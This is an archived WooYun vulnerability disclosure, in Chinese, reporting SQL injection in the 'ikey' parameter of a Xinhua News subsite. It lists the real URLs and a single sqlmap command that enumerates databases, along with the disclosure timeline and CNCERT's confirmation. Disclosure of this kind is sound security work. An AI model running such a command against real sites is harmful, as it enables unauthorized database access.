漏洞概要关注数(1)关注此漏洞

漏洞概要
关注数(
1
)
关注此漏洞
缺陷编号：
WooYun-2014-87820
漏洞标题：		新华网某子站SQL注入
相关厂商：
cncert国家互联网应急中心
漏洞作者：
路人甲
提交时间：		2014-12-19 15:47
公开时间：		2015-02-02 15:48
漏洞类型：		SQL注射漏洞
危害等级：		高
自评Rank：		11
漏洞状态：		
																							已交由第三方厂商(cncert国家互联网应急中心)处理
漏洞来源：
http://www.wooyun.org
Tags标签：
asp+sqlserver注射
0
人收藏
收藏
分享漏洞：
漏洞详情
披露状态：
2014-12-19：	细节已通知厂商并且等待厂商处理中
2014-12-24：	厂商已经确认，细节仅向厂商公开
2015-01-03：	细节向核心白帽子及相关领域专家公开
2015-01-13：	细节向普通白帽子公开
2015-01-23：	细节向实习白帽子公开
2015-02-02：	细节向公众公开
简要描述：
新华网某子站SQL注入
详细说明：
http://www.zhongguowangshi.com/scencelist.aspx
http://zgws.xinhuanet.com/scencelist.aspx
用burp 截获数据保存为1.txt，其中的ikey参数存在注入
code 区域
sqlmap -r 1.txt -p ikey --level 3 --dbs
漏洞证明：
修复方案：
过滤参数
版权声明：转载请注明来源
路人甲
@
乌云
漏洞回应
厂商回应：
危害等级：高
漏洞Rank：11
确认时间：2014-12-24 08:44
厂商回复：
CNVD确认并复现所述情况,已经转由CNCERT向新闻行业主管部门以及涉事单位技术局通报,由其后续协调管理单位处置.
最新状态：
暂无
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价
(共
0
人评价)
:
登陆后才能进行评分
评论
登录后才能发表评论，请先
登录
。
Copyright © 2010 - 2015
wooyun.org
, All Rights Reserved
吉ICP备12001400号-1
行业观点
·
法律顾问
·
联系我们
·
帮助
·
关于